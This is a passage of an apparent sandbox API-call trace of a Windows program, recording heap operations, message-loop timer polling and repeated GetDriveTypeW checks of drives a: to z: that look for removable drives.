0x14bd2b0 [0219.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0219.100] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.100] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.100] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.100] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.100] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.100] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.100] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.100] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.100] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.101] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.101] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.101] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.101] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.101] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.101] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.102] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.102] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.102] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.102] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.102] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.102] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.103] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.103] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.103] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.103] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.103] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.103] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0219.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.104] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0219.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0219.105] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0219.105] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.105] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.105] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.105] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.106] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0219.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.106] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.106] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.107] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.107] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.107] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.107] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.107] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.108] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.108] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.108] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.108] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.108] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.109] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.109] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.109] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.109] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.109] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.109] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.110] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.110] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.110] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.110] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.110] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.110] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.110] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.111] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.111] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0219.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0219.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.112] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.112] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.112] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.112] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0219.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0219.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0219.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0219.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.113] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.113] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.113] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.113] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0219.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.114] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.114] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.114] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.114] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.114] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.115] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.115] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.115] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.115] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.115] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.116] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.116] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.116] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.116] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.117] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.117] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.117] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.117] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.118] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.118] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.118] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.118] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.119] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.119] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.119] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.120] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.120] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.156] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.156] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0219.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0219.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.170] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.170] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.170] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.170] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.170] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.170] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0219.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0219.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0219.171] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0219.171] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.172] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.172] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.172] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0219.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.173] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", 